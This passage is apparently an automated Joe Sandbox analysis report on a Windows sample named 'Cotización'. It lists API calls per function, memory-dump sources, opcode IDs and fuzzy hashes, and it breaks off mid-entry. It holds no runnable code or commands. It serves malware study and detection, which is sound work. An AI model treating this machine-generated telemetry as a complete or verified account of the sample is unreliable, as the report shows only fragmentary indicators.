                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                • String ID:
                • API String ID: 2354583917-0
                • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                APIs
                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AddressProc$Library$FreeLoad
                • String ID: ou
                • API String ID: 2449869053-3837949563
                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                APIs
                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$Enable$Show$MessageMoveSend
                • String ID:
                • API String ID: 896007046-0
                • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                APIs
                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                • GetFocus.USER32 ref: 00448ACF
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$Enable$Show$FocusMessageSend
                • String ID:
                • API String ID: 3429747543-0
                • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                APIs
                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                • String ID:
                • API String ID: 3300667738-0
                • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                APIs
                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                • __swprintf.LIBCMT ref: 0045D4E9
                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ErrorMode$InformationVolume__swprintf
                • String ID: %lu$\VH
                • API String ID: 3164766367-2432546070
                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                APIs
                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend
                • String ID: Msctls_Progress32
                • API String ID: 3850602802-3636473452
                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                • String ID:
                • API String ID: 3985565216-0
                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                APIs
                • _malloc.LIBCMT ref: 0041F707
                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                • _free.LIBCMT ref: 0041F71A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID: [B
                • API String ID: 1020059152-632041663
                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                • __calloc_crt.LIBCMT ref: 00413DB0
                • __getptd.LIBCMT ref: 00413DBD
                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                • _free.LIBCMT ref: 00413E07
                • __dosmaperr.LIBCMT ref: 00413E12
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                • String ID:
                • API String ID: 155776804-0
                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                APIs
                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                • String ID:
                • API String ID: 1957940570-0
                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                APIs
                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                • ExitThread.KERNEL32 ref: 00413D4E
                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                • __freefls@4.LIBCMT ref: 00413D74
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                • String ID:
                • API String ID: 259663610-0
                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                APIs
                • GetClientRect.USER32(?,?), ref: 004302E6
                • GetWindowRect.USER32(00000000,?), ref: 00430316
                • GetClientRect.USER32(?,?), ref: 00430364
                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                • GetWindowRect.USER32(?,?), ref: 004303C3
                • ScreenToClient.USER32(?,?), ref: 004303EC
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Rect$Client$Window$MetricsScreenSystem
                • String ID:
                • API String ID: 3220332590-0
                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _malloc_wcslen$_strcat_wcscpy
                • String ID:
                • API String ID: 1612042205-0
                • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
